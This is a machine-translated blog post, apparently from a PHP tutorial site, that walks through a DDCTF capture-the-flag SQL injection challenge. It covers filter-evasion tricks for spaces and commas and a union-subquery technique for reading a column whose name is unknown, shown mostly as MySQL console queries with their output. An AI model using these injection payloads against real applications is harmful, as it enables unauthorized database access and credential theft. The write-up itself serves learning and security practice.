Detailed explanation of the example code on how Mysql cleverly bypasses unknown field names
- 黄舟Original
- 2017-06-04 10:03:39972browse
This article mainly introduces Mysql to you on how to cleverly bypass unknown field names. The article gives detailed sample codes for your reference and study, which has a certain reference for learning mysql. The value of learning, friends who need it, come and take a look below.
Preface
This article introduces the fifth question of DDCTF, the technique of bypassing unknown field names. Here I use this machine to operate it. , the idea is great and clear, I would like to share it with you, let’s take a look at the detailed introduction:
Implementation idea
The question filters spaces and Commas and spaces can be bypassed by using %0a, %0b, %0c, %0d, %a0, or directly using parentheses. Commas can be bypassed by using join;
The field name where the flag is stored is unknown, information_schema.columns also filters the hex of the table name, that is, the field name cannot be obtained; then you can use joint query, the process is as follows:
The idea is to get the flag , let it appear under the known field name;
Sample code:
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ | a | b | c | d | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ 1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ | 1 | 2 | 3 | 4 | +---+---+---+---+ 1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user; +---+-------+----------+-------------+ | 1 | 2 | 3 | 4 | +---+-------+----------+-------------+ | 1 | 2 | 3 | 4 | | 1 | admin | admin888 | 110@110.com | | 2 | test | test123 | 119@119.com | | 3 | cs | cs123 | 120@120.com | +---+-------+----------+-------------+ 4 rows in set (0.01 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e; +-------------+ | 4 | +-------------+ | 4 | | 110@110.com | | 119@119.com | | 120@120.com | +-------------+ 4 rows in set (0.03 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3; +-------------+ | 4 | +-------------+ | 120@120.com | +-------------+ 1 row in set (0.01 sec) mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i; +-------------+----------+----------+-------------+ | id | username | password | email | +-------------+----------+----------+-------------+ | 1 | admin | admin888 | 110@110.com | | 120@120.com | 1 | 1 | 1 | +-------------+----------+----------+-------------+ 2 rows in set (0.04 sec)
Summary
The above is the detailed content of Detailed explanation of the example code on how Mysql cleverly bypasses unknown field names. For more information, please follow other related articles on the PHP Chinese website!